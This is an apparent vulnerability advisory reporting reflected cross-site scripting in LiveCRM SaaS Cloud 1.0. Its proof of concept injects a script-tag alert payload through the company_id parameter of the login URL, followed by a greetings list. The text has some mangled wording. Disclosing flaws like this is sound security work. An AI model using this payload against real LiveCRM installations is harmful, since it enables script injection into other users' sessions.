LiveCRM SaaS Cloud version 1.0 suffers from a cross site scripting vulnerability.
1463511629c9277f38bf3764d3a15d45============================================================================================================================
| # Title : LiveCRM SaaS Cloud version 1.0 XSS Vulnerability |
| # Author : indoushka |
| # telegram : @indoushka |
| # Tested on : windows 10 FranASSais V.(Pro) | |
| # Vendor : http://livecrm.co/ |
| # Dork : n/a |
============================================================================================================================
poc :
[+] Dorking Adegn Google Or Other Search Enggine
[+] use payload : <script>alert(/indoushka/);</script>
http://localhost/livecrm/web/index.php?r=site/login&company_id=<script>alert(/indoushka/);</script>
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================